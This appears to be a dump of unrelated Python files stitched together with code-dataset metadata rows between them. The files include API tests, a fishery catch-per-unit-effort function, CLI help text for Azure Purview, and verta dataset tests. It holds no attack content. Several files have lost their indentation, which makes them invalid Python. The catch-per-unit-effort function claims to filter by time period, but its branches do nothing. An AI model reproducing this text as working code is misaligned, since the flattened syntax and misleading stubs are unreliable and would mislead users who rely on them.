# Basic sanity check
assert resp.headers["content-type"] == "text/plain; charset=utf-8"
def test_spinning(self):
auth_client = tools.generate_authed_client()
resp = auth_client.get("/api/spinning")
tools.assure_ok_response(resp)
tools.assure_bool(resp)
# See pytest.ini on how to run this test
@pytest.mark.bot_offline
def test_bot_offline(self):
# Test to assure the API handles a bot outage properly
resp = tools.make_bot_request("/api/whoami")
tools.assure_identical_response(resp, no_reply_response)
class TestMain():
def test_logout_noauth(self): tools.assure_noauth(noauth_client.get("/api/logout"))
def test_logout(self):
auth_client = tools.generate_authed_client()
resp = auth_client.get("/api/logout")
tools.assure_ok_response(resp)
assert resp.content == successful_action_response.body
# Assure that the session was cleared properly
assert resp.cookies.items() == []
def test_whoami_noauth(self): tools.assure_noauth(noauth_client.get("/api/whoami"))
def test_whoami(self):
resp = tools.make_bot_request("/api/whoami")
tools.assure_ok_response(resp)
# Make sure all expected fields exist, and that they are the right type
resp: dict = resp.json()
tools.assure_fields_and_types(resp, ["username", "discrim", "avatar_url", "bot_admin_status"])
# Make sure the discriminator can always be converted into a number
assert int(resp["discrim"])
def test_generalinfo(self):
resp = tools.make_bot_request("/api/general_info")
tools.assure_ok_response(resp)
tools.assure_fields_and_types(resp.json(), ["languages", "logging"])

# pymontecarlo_gui/conftest.py
# repo: pymontecarlo/pymontecarlo-gui (Apache-2.0)
""""""
# Standard library modules.
# Third party modules.
import pytest
# Local modules.
from pymontecarlo.options import Material
# Globals and constants variables.
@pytest.fixture
def materials():
return [
Material.pure(13),
Material.from_formula("Al2O3"),
Material("foo", {29: 0.5, 28: 0.5}, 2.0),
]

# lakepowell/catch_per_unit_effort_functions.py
# repo: mrwigington/LakePowell (MIT)
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 31 13:19:05 2020
@author: aquag
"""
# Available variables:
#   time frame: year, month, trip
#   biotic factor: fish, length, weight
def calc_catch_per_unit_effort(data, time, bio_fac):
    # TODO: normalize by effort once those data are available: divide by
    # soak time (average hours per overnight net set) and by average net
    # size, with one net per site.
    # Filter the data to the requested time period.
    if time == 'year':
        pass
    elif time == 'month':
        pass
    elif time == 'trip':
        pass
    else:
        raise ValueError("time must be 'year', 'month', or 'trip'")
    # Sum up the chosen biotic factor (fish count, length, or weight).
    if bio_fac == 'fish':
        # number of fish caught = number of rows
        calc_variable = len(data)
    elif bio_fac == 'length':
        calc_variable = sum(data['Length'])
    elif bio_fac == 'weight':
        calc_variable = sum(data['Weight'])
    else:
        raise ValueError("bio_fac must be 'fish', 'length', or 'weight'")
    # Divide by the number of unique sampling sites in the collection.
    sites = data['Site']
    total_sites = len(set(sites))
    catch_per = calc_variable / total_sites
    return catch_per
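
A quick hand check of the weight-based calculation, using a hypothetical column-of-lists sample (all values invented for illustration). This mirrors what the function above computes for `bio_fac='weight'`: total weight divided by the number of unique sites.

```python
# Hypothetical sample, mimicking the columns the function expects.
sample = {
    'Weight': [1.2, 0.8, 2.0, 1.0],
    'Length': [30.0, 25.0, 41.0, 28.0],
    'Site': ['A', 'A', 'B', 'C'],
}

total_weight = sum(sample['Weight'])    # 5.0
total_sites = len(set(sample['Site']))  # 3 unique sites
cpue = total_weight / total_sites
print(round(cpue, 3))  # 1.667
```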

# maze_solver/__main__.py
# repo: MaciejChoromanski/maze-solver (MIT)
from utils import (
get_input_data,
solve_maze_from_file,
solve_test_mazes,
display_help,
)
def main() -> None:
"""Entry point of the script"""
mode, value = get_input_data()
if mode == 'file':
solve_maze_from_file(value)
elif mode == 'test':
solve_test_mazes()
else:
display_help()
if __name__ == '__main__':
main()

# cumulusci/tasks/metadata_etl/__init__.py
# repo: hamedizadpanah-ibm/CumulusCI (BSD-3-Clause)
from cumulusci.tasks.metadata_etl.base import (
BaseMetadataETLTask,
BaseMetadataSynthesisTask,
BaseMetadataTransformTask,
MetadataSingleEntityTransformTask,
MetadataOperation,
)
from cumulusci.tasks.metadata_etl.duplicate_rules import SetDuplicateRuleStatus
from cumulusci.tasks.metadata_etl.layouts import AddRelatedLists
from cumulusci.tasks.metadata_etl.permissions import AddPermissionSetPermissions
from cumulusci.tasks.metadata_etl.value_sets import AddValueSetEntries
from cumulusci.tasks.metadata_etl.sharing import SetOrgWideDefaults
flake8 = (
BaseMetadataETLTask,
BaseMetadataSynthesisTask,
BaseMetadataTransformTask,
MetadataSingleEntityTransformTask,
AddRelatedLists,
AddPermissionSetPermissions,
AddValueSetEntries,
SetOrgWideDefaults,
MetadataOperation,
SetDuplicateRuleStatus,
)
| 32.961538 | 80 | 0.833139 | 65 | 857 | 10.861538 | 0.384615 | 0.110482 | 0.152975 | 0.220963 | 0.246459 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00133 | 0.12252 | 857 | 25 | 81 | 34.28 | 0.9375 | 0 | 0 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb8e46faee804c97f7f2637c49b375cfb9527661 | 70 | py | Python | django_widgets/jinja2tags/__init__.py | LeonLegion/django-widgets | 524b09b63ad4c122d3faed9e8cac353974bfe95e | [
"BSD-3-Clause"
] | null | null | null | django_widgets/jinja2tags/__init__.py | LeonLegion/django-widgets | 524b09b63ad4c122d3faed9e8cac353974bfe95e | [
"BSD-3-Clause"
] | null | null | null | django_widgets/jinja2tags/__init__.py | LeonLegion/django-widgets | 524b09b63ad4c122d3faed9e8cac353974bfe95e | [
"BSD-3-Clause"
] | null | null | null | from .widget import WidgetExtension as widget
_all_ = [
widget
]
| 11.666667 | 45 | 0.714286 | 8 | 70 | 6 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228571 | 70 | 5 | 46 | 14 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb8eac16fa1ef02a6c1ee068ed789b4711c48526 | 5,454 | py | Python | src/purview/azext_purview/generated/_help.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 207 | 2017-11-29T06:59:41.000Z | 2022-03-31T10:00:53.000Z | src/purview/azext_purview/generated/_help.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 4,061 | 2017-10-27T23:19:56.000Z | 2022-03-31T23:18:30.000Z | src/purview/azext_purview/generated/_help.py | haroonf/azure-cli-extensions | 61c044d34c224372f186934fa7c9313f1cd3a525 | [
"MIT"
] | 802 | 2017-10-11T17:36:26.000Z | 2022-03-31T22:24:32.000Z | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from knack.help_files import helps
helps['purview'] = '''
type: group
short-summary: Manage Purview
'''
helps['purview account'] = """
type: group
short-summary: Manage account with purview
"""
helps['purview account list'] = """
type: command
short-summary: "List accounts in ResourceGroup And List accounts in Subscription."
examples:
- name: Accounts_ListByResourceGroup
text: |-
az purview account list --resource-group "SampleResourceGroup"
- name: Accounts_ListBySubscription
text: |-
az purview account list
"""
helps['purview account show'] = """
type: command
short-summary: "Get an account."
examples:
- name: Accounts_Get
text: |-
az purview account show --name "account1" --resource-group "SampleResourceGroup"
"""
helps['purview account create'] = """
type: command
short-summary: "Create an account."
parameters:
- name: --sku
short-summary: "Gets or sets the Sku."
long-summary: |
Usage: --sku capacity=XX name=XX
capacity: Gets or sets the sku capacity. Possible values include: 4, 16
name: Gets or sets the sku name.
examples:
- name: Accounts_CreateOrUpdate
text: |-
az purview account create --location "West US 2" --managed-resource-group-name "custom-rgname" --sku \
name="Standard" capacity=4 --name "account1" --resource-group "SampleResourceGroup"
"""
helps['purview account update'] = """
type: command
short-summary: "Updates an account."
examples:
- name: Accounts_Update
text: |-
az purview account update --name "account1" --tags newTag="New tag value." --resource-group \
"SampleResourceGroup"
"""
helps['purview account delete'] = """
type: command
short-summary: "Deletes an account resource."
examples:
- name: Accounts_Delete
text: |-
az purview account delete --name "account1" --resource-group "SampleResourceGroup"
"""
helps['purview account add-root-collection-admin'] = """
type: command
short-summary: "Add the administrator for root collection associated with this account."
examples:
- name: Accounts_AddRootCollectionAdmin
text: |-
az purview account add-root-collection-admin --name "account1" --object-id \
"7e8de0e7-2bfc-4e1f-9659-2a5785e4356f" --resource-group "SampleResourceGroup"
"""
helps['purview account list-key'] = """
type: command
short-summary: "List the authorization keys associated with this account."
examples:
- name: Accounts_ListKeys
text: |-
az purview account list-key --name "account1" --resource-group "SampleResourceGroup"
"""
helps['purview account wait'] = """
type: command
short-summary: Place the CLI in a waiting state until a condition of the purview account is met.
examples:
- name: Pause executing next line of CLI script until the purview account is successfully created.
text: |-
az purview account wait --name "account1" --resource-group "SampleResourceGroup" --created
- name: Pause executing next line of CLI script until the purview account is successfully updated.
text: |-
az purview account wait --name "account1" --resource-group "SampleResourceGroup" --updated
- name: Pause executing next line of CLI script until the purview account is successfully deleted.
text: |-
az purview account wait --name "account1" --resource-group "SampleResourceGroup" --deleted
"""
helps['purview default-account'] = """
type: group
short-summary: Manage default account with purview
"""
helps['purview default-account show'] = """
type: command
short-summary: "Get the default account for the scope."
examples:
- name: DefaultAccounts_Get
text: |-
az purview default-account show --scope "12345678-1234-1234-12345678abc" --scope-tenant-id \
"12345678-1234-1234-12345678abc" --scope-type "Tenant"
"""
helps['purview default-account remove'] = """
type: command
short-summary: "Removes the default account from the scope."
examples:
- name: DefaultAccounts_Remove
text: |-
az purview default-account remove --scope "12345678-1234-1234-12345678abc" --scope-tenant-id \
"12345678-1234-1234-12345678abc" --scope-type "Tenant"
"""
helps['purview default-account set'] = """
type: command
short-summary: "Sets the default account for the scope."
examples:
- name: DefaultAccounts_Set
text: |-
az purview default-account set --account-name "myDefaultAccount" --resource-group "rg-1" --scope \
"12345678-1234-1234-12345678abc" --scope-tenant-id "12345678-1234-1234-12345678abc" --scope-type "Tenant" \
--subscription-id "12345678-1234-1234-12345678aaa"
"""
| 35.881579 | 117 | 0.642831 | 598 | 5,454 | 5.842809 | 0.262542 | 0.096165 | 0.052089 | 0.07241 | 0.550944 | 0.426445 | 0.361191 | 0.314253 | 0.242129 | 0.210647 | 0 | 0.047832 | 0.221856 | 5,454 | 151 | 118 | 36.119205 | 0.775448 | 0.086175 | 0 | 0.435484 | 0 | 0.056452 | 0.934245 | 0.137141 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.008065 | 0 | 0.008065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb901ce473e70128b293cb2d80e0968b8e60c823 | 239 | py | Python | src/backend/tests/conftest.py | rollsroycedev/MEC | d9a342059f56d199acba1968659b9d440a764278 | [
"MIT"
] | 1 | 2021-09-07T14:53:16.000Z | 2021-09-07T14:53:16.000Z | src/backend/tests/conftest.py | rollsroycedev/MEC | d9a342059f56d199acba1968659b9d440a764278 | [
"MIT"
] | 24 | 2021-07-22T14:17:26.000Z | 2022-02-14T09:42:12.000Z | src/backend/tests/conftest.py | rropen/MEC | d9a342059f56d199acba1968659b9d440a764278 | [
"MIT"
] | null | null | null | import pytest
from starlette.testclient import TestClient
# from mec.models import Meeting
from mec.main import app
# Creates a new test client connection for the module
@pytest.fixture(scope="module")
def test_app():
client = TestClient(app)
yield client
| 19.916667 | 43 | 0.76569 | 33 | 239 | 5.515152 | 0.636364 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158996 | 239 | 11 | 44 | 21.727273 | 0.905473 | 0.230126 | 0 | 0 | 0 | 0 | 0.033149 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.428571 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
fb9702db1ce869454c704ccbdc809698afa5b512 | 162 | py | Python | backend/wsgi.py | saycel/black-rock-forest | 5a59071e10e0436edcea8c2eceb61b80e0711126 | [
"Apache-2.0"
] | null | null | null | backend/wsgi.py | saycel/black-rock-forest | 5a59071e10e0436edcea8c2eceb61b80e0711126 | [
"Apache-2.0"
] | null | null | null | backend/wsgi.py | saycel/black-rock-forest | 5a59071e10e0436edcea8c2eceb61b80e0711126 | [
"Apache-2.0"
] | 3 | 2019-06-20T18:06:01.000Z | 2020-03-18T18:11:02.000Z | from backend.app import create_app
brfc = create_app()
# set as PYTHONPATH the backend folder
if __name__ == "__main__":
brfc.run(host="0.0.0.0", port=2323)
| 23.142857 | 39 | 0.716049 | 27 | 162 | 3.925926 | 0.703704 | 0.056604 | 0.056604 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058394 | 0.154321 | 162 | 6 | 40 | 27 | 0.715328 | 0.222222 | 0 | 0 | 0 | 0 | 0.120968 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fbabd4486cddab3f8e2b9333ae23c5ad90877d89 | 21,417 | py | Python | client/verta/tests/test_datasets.py | coutureai/CoutureModelDB | a799c0e3d6239bf79ac1462a936742af03492607 | [
"Apache-2.0"
] | null | null | null | client/verta/tests/test_datasets.py | coutureai/CoutureModelDB | a799c0e3d6239bf79ac1462a936742af03492607 | [
"Apache-2.0"
] | null | null | null | client/verta/tests/test_datasets.py | coutureai/CoutureModelDB | a799c0e3d6239bf79ac1462a936742af03492607 | [
"Apache-2.0"
] | null | null | null | import pytest
import six
import os
import time
import shutil
from . import utils
import verta
import verta.dataset
from verta._internal_utils import _utils
from verta._dataset import Dataset, DatasetVersion, S3DatasetVersionInfo, FilesystemDatasetVersionInfo
from verta._protos.public.modeldb import DatasetService_pb2 as _DatasetService
from verta._protos.public.modeldb import DatasetVersionService_pb2 as _DatasetVersionService
DEFAULT_S3_TEST_BUCKET = "bucket"
DEFAULT_S3_TEST_OBJECT = "object"
DEFAULT_GOOGLE_APPLICATION_CREDENTIALS = "credentials.json"
# for `tags` typecheck tests
TAG = "my-tag"
@pytest.fixture(scope='session')
def s3_bucket():
return os.environ.get("VERTA_S3_TEST_BUCKET", DEFAULT_S3_TEST_BUCKET)
@pytest.fixture(scope='session')
def s3_object():
return os.environ.get("VERTA_S3_TEST_OBJECT", DEFAULT_S3_TEST_OBJECT)
@pytest.fixture(scope='session')
def bq_query():
return (
"SELECT id, `by`, score, time, time_ts, title, url, text, deleted, dead, descendants, author"
" FROM `bigquery-public-data.hacker_news.stories`"
" LIMIT 1000"
)
@pytest.fixture(scope='session')
def bq_location():
return "US"
class TestBaseDatasets:
def test_creation_from_scratch(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
assert dataset.id
def test_creation_by_id(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
assert dataset.id
same_dataset = Dataset(client._conn, client._conf,
_dataset_id=dataset.id)
assert dataset.id == same_dataset.id
class TestBaseDatasetVersions:
@pytest.mark.skip(reason="direct instantiation of info-less DatasetVersion not supported by backend")
def test_creation_from_scratch(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
version = DatasetVersion(client._conn, client._conf,
dataset_id=dataset.id,
dataset_version_info=_DatasetVersionService.PathDatasetVersionInfo(),
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
assert version.id
@pytest.mark.skip(reason="direct instantiation of info-less DatasetVersion not supported by backend")
def test_creation_by_id(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
version = DatasetVersion(client._conn, client._conf,
dataset_id=dataset.id,
dataset_version_info=_DatasetVersionService.PathDatasetVersionInfo(),
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
assert version.id
same_version = DatasetVersion(client._conn, client._conf,
_dataset_version_id=version.id)
assert version.id == same_version.id
@pytest.mark.parametrize("tags", [TAG, [TAG]])
@pytest.mark.skip(reason="api no longer supported by backend")
def test_tags_is_list_of_str(self, client, created_datasets, tags):
dataset = client.set_dataset(tags=tags)
created_datasets.append(dataset)
version = dataset.create_version("conftest.py", tags=tags)
endpoint = "{}://{}/api/v1/modeldb/dataset-version/getDatasetVersionTags".format(
client._conn.scheme,
client._conn.socket,
)
response = verta._internal_utils._utils.make_request("GET", endpoint, client._conn, params={'id': version.id})
verta._internal_utils._utils.raise_for_http_error(response)
assert response.json().get('tags', []) == [TAG]
# TODO: not implemented
class TestRawDatasets:
pass
# TODO: not implemented
class TestRawDatasetVersions:
pass
class TestPathDatasets:
def test_creation_from_scratch(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
assert dataset.id
def test_creation_by_id(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
assert dataset.id
same_dataset = Dataset(client._conn, client._conf,
_dataset_id=dataset.id)
assert dataset.id == same_dataset.id
class TestClientDatasetFunctions:
def test_creation_from_scratch_client_api(self, client, created_datasets):
dataset = client.set_dataset(type="s3")
created_datasets.append(dataset)
assert dataset.id
def test_creation_by_id_client_api(self, client, created_datasets):
dataset = client.set_dataset(type="s3")
created_datasets.append(dataset)
assert dataset.id
same_dataset = client.set_dataset(id=dataset.id)
assert dataset.id == same_dataset.id
assert dataset.name == same_dataset.name
def test_get_dataset_client_api(self, client, created_datasets):
dataset = client.set_dataset(type="s3")
created_datasets.append(dataset)
assert dataset.id
same_dataset = client.get_dataset(id=dataset.id)
assert dataset.id == same_dataset.id
assert dataset.name == same_dataset.name
same_dataset = client.get_dataset(name=dataset.name)
assert dataset.id == same_dataset.id
assert dataset.name == same_dataset.name
def test_find_datasets_by_fuzzy_name(self, client, created_datasets):
now = str(_utils.now())
created_datasets.append(client.set_dataset(now+" appl"))
created_datasets.append(client.set_dataset(now+" Appl"))
created_datasets.append(client.set_dataset(now+" Apple"))
datasets = client.find_datasets(name=now+" Appl")
assert len(datasets) == 3
@pytest.mark.skip("See #1285")
def test_find_datasets_client_api(self, client, created_datasets):
tags = ["test1a-{}".format(_utils.now()), "test1b-{}".format(_utils.now())]
dataset1 = client.set_dataset(type="big query", tags=tags)
created_datasets.append(dataset1)
assert dataset1.id
single_tag = ["test2-{}".format(_utils.now())]
dataset2 = client.set_dataset(type="s3", tags=single_tag)
created_datasets.append(dataset2)
assert dataset2.id
# TODO: update once RAW is supported
# dataset3 = client.set_dataset(type="raw")
# created_datasets.append(dataset3)
# assert dataset3._dataset_type == _DatasetService.DatasetTypeEnum.RAW
# assert dataset3.id
# datasets = client.find_datasets()
# assert len(datasets) == 3
# assert datasets[0].id == dataset1.id
# assert datasets[1].id == dataset2.id
# assert datasets[2].id == dataset3.id
datasets = client.find_datasets(tags=tags)
assert len(datasets) == 1
assert datasets[0].id == dataset1.id
# str arg automatically wrapped into list by client
datasets = client.find_datasets(tags=single_tag[0])
assert len(datasets) == 1
assert datasets[0].id == dataset2.id
datasets = client.find_datasets(name=dataset1.name)
assert len(datasets) == 1
assert datasets[0].id == dataset1.id
datasets = client.find_datasets(dataset_ids=[dataset1.id, dataset2.id], name=dataset1.name)
assert len(datasets) == 1
assert datasets[0].id == dataset1.id
# test sorting ascending
datasets = client.find_datasets(
dataset_ids=[dataset1.id, dataset2.id],
sort_key="time_created", ascending=True,
)
assert [dataset.id for dataset in datasets] == [dataset1.id, dataset2.id]
# and descending
datasets = client.find_datasets(
dataset_ids=[dataset1.id, dataset2.id],
sort_key="time_created", ascending=False,
)
assert [dataset.id for dataset in datasets] == [dataset2.id, dataset1.id]
class TestClientDatasetVersionFunctions:
def test_creation_from_scratch(self, client, created_datasets):
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
version = dataset.create_version(__file__)
assert version.id
def test_creation_by_id(self, client, created_datasets):
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
version = dataset.create_version(__file__)
assert version.id
same_version = client.get_dataset_version(id=version.id)
assert version.id == same_version.id
def test_get_versions(self, client, created_datasets):
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
version1 = dataset.create_version(path=__file__)
assert version1.id
version2 = dataset.create_version(path=pytest.__file__)
assert version2.id
versions = dataset.get_all_versions()
assert len(versions) == 2
dataset_version1 = client.get_dataset_version(id=version1.id)
assert dataset_version1.id == version1.id
version = dataset.get_latest_version(ascending=True)
assert version.id == version1.id
@pytest.mark.skip(reason="functionality removed")
def test_reincarnation(self, client, created_datasets):
"""Consecutive identical versions are assigned the same ID."""
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
version1 = dataset.create_version(path=__file__)
version2 = dataset.create_version(path=__file__)
assert version1.id == version2.id
versions = dataset.get_all_versions()
assert len(versions) == 1
version = dataset.get_latest_version(ascending=True)
assert version.id == version1.id
class TestPathBasedDatasetVersions:
@pytest.mark.skip(reason="direct instantiation of info-less DatasetVersion not supported by backend")
def test_creation_from_scratch(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
version = DatasetVersion(client._conn, client._conf,
dataset_id=dataset.id,
dataset_version_info=_DatasetVersionService.PathDatasetVersionInfo(),
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
assert version.id
@pytest.mark.skip(reason="direct instantiation of info-less DatasetVersion not supported by backend")
def test_creation_by_id(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
created_datasets.append(dataset)
version = DatasetVersion(client._conn, client._conf,
dataset_id=dataset.id,
dataset_version_info=_DatasetVersionService.PathDatasetVersionInfo(),
dataset_type=_DatasetService.DatasetTypeEnum.PATH)
assert version.id
same_version = DatasetVersion(client._conn, client._conf,
_dataset_version_id=version.id)
assert version.id == same_version.id
class TestQueryDatasets:
def test_creation_from_scratch(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.DatasetType.QUERY)
created_datasets.append(dataset)
assert dataset.id
def test_creation_by_id(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.DatasetType.QUERY)
created_datasets.append(dataset)
assert dataset.id
same_dataset = Dataset(client._conn, client._conf,
_dataset_id=dataset.id)
assert dataset.id == same_dataset.id
class TestQueryDatasetVersions:
@pytest.mark.skip(reason="direct instantiation of info-less DatasetVersion not supported by backend")
def test_creation_from_scratch(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.DatasetType.QUERY)
created_datasets.append(dataset)
version = DatasetVersion(client._conn, client._conf,
dataset_id=dataset.id,
dataset_version_info=_DatasetVersionService.QueryDatasetVersionInfo(),
dataset_type=_DatasetService.DatasetTypeEnum.QUERY)
assert version.id
@pytest.mark.skip(reason="direct instantiation of info-less DatasetVersion not supported by backend")
def test_creation_by_id(self, client, created_datasets):
dataset = Dataset(client._conn, client._conf,
dataset_type=_DatasetService.DatasetTypeEnum.QUERY)
created_datasets.append(dataset)
version = DatasetVersion(client._conn, client._conf,
dataset_id=dataset.id,
dataset_version_info=_DatasetVersionService.QueryDatasetVersionInfo(),
dataset_type=_DatasetService.DatasetTypeEnum.QUERY)
assert version.id
same_version = DatasetVersion(client._conn, client._conf,
_dataset_version_id=version.id)
assert version.id == same_version.id
class TestFileSystemDatasetVersionInfo:
def test_single_file(self):
dir_name, file_names = self.create_dir_with_files(num_files=1)
fsdvi = FilesystemDatasetVersionInfo(dir_name + "/" + file_names[0])
assert len(fsdvi.dataset_part_infos) == 1
assert fsdvi.size == 7
shutil.rmtree(dir_name)
def test_dir(self):
dir_name, _ = self.create_dir_with_files(num_files=10)
fsdvi = FilesystemDatasetVersionInfo(dir_name)
assert len(fsdvi.dataset_part_infos) == 10
assert fsdvi.size == 70
shutil.rmtree(dir_name)
def create_dir_with_files(self, num_files=10):
dir_name = 'FSD:' + str(time.time())
file_names = []
os.mkdir(dir_name)
for num_file in range(num_files):
file_name = str(num_file) + ".txt"
f = open(dir_name + "/" + file_name, 'w')
f.write('123456\n')
file_names.append(file_name)
return dir_name, file_names
class TestS3DatasetVersionInfo:
def test_single_object(self, s3_bucket, s3_object):
botocore = pytest.importorskip("botocore")
try:
s3dvi = S3DatasetVersionInfo(s3_bucket, s3_object)
assert len(s3dvi.dataset_part_infos) == 1
assert s3dvi.size > 0
except botocore.exceptions.ClientError:
pytest.skip("insufficient AWS credentials")
def test_bucket(self, s3_bucket):
botocore = pytest.importorskip("botocore")
try:
s3dvi = S3DatasetVersionInfo(s3_bucket)
assert len(s3dvi.dataset_part_infos) >= 1
assert s3dvi.size > 0
except botocore.exceptions.ClientError:
pytest.skip("insufficient AWS credentials")
class TestS3ClientFunctions:
def test_s3_dataset_creation(self, client, created_datasets):
botocore = pytest.importorskip("botocore")
try:
dataset = client.set_dataset(type="s3")
created_datasets.append(dataset)
except botocore.exceptions.ClientError:
pytest.skip("insufficient AWS credentials")
def test_s3_dataset_version_creation(self, client, s3_bucket, created_datasets):
botocore = pytest.importorskip("botocore")
try:
dataset = client.set_dataset(type="s3")
created_datasets.append(dataset)
dataset_version = dataset.create_version(s3_bucket)
assert len(dataset_version.dataset_version_info.dataset_part_infos) >= 1
except botocore.exceptions.ClientError:
pytest.skip("insufficient AWS credentials")
class TestFilesystemClientFunctions:
def test_filesystem_dataset_creation(self, client, created_datasets):
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
def test_filesystem_dataset_version_creation(self, client, created_datasets):
dir_name, _ = self.create_dir_with_files(num_files=3)
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
dataset_version = dataset.create_version(dir_name)
assert len(dataset_version.dataset_version_info.dataset_part_infos) == 3
shutil.rmtree(dir_name)
def create_dir_with_files(self, num_files=10):
dir_name = 'FSD:' + str(time.time())
file_names = []
os.mkdir(dir_name)
for num_file in range(num_files):
file_name = str(num_file) + ".txt"
f = open(dir_name + "/" + file_name, 'w')
f.write('123456\n')
file_names.append(file_name)
return dir_name, file_names
@pytest.mark.skip("dropped support for query datasets, for the time being")
class TestBigQueryDatasetVersionInfo:
def test_big_query_dataset(self, client, created_datasets):
dataset = client.set_dataset(type="big query")
created_datasets.append(dataset)
def test_big_query_dataset_version_creation(self, client, bq_query, bq_location, created_datasets):
google = pytest.importorskip("google")
bigquery = pytest.importorskip("google.cloud.bigquery")
try:
query_job = google.cloud.bigquery.Client().query(
bq_query,
# Location must match that of the dataset(s) referenced in the query.
location=bq_location,
)
dataset = client.set_dataset(type="big query")
created_datasets.append(dataset)
dataset_version = dataset.create_version(job_id=query_job.job_id, location=bq_location)
assert dataset_version.dataset_version_info.query == bq_query
except google.auth.exceptions.GoogleAuthError:
pytest.skip("insufficient GCP credentials")
@pytest.mark.skip("dropped support for query datasets, for the time being")
class TestRDBMSDatasetVersionInfo:
def test_rdbms_dataset(self, client, created_datasets):
dataset = client.set_dataset(type="postgres")
created_datasets.append(dataset)
def test_rdbms_version_creation(self, client, created_datasets):
dataset = client.set_dataset(type="postgres")
created_datasets.append(dataset)
dataset_version = dataset.create_version(query="SELECT * FROM ner-table",
db_connection_str="localhost:6543",
num_records=100)
assert dataset_version.dataset_version_info.query == "SELECT * FROM ner-table"
assert dataset_version.dataset_version_info.data_source_uri == "localhost:6543"
assert dataset_version.dataset_version_info.num_records == 100
@pytest.mark.skip("Backend needs to be fixed to preserve `base_path`")
class TestLogDatasetVersion:
def test_log_dataset_version(self, client, created_datasets, experiment_run):
dataset = client.set_dataset(type="local")
created_datasets.append(dataset)
dataset_version = dataset.create_version(__file__)
experiment_run.log_dataset_version('train', dataset_version)
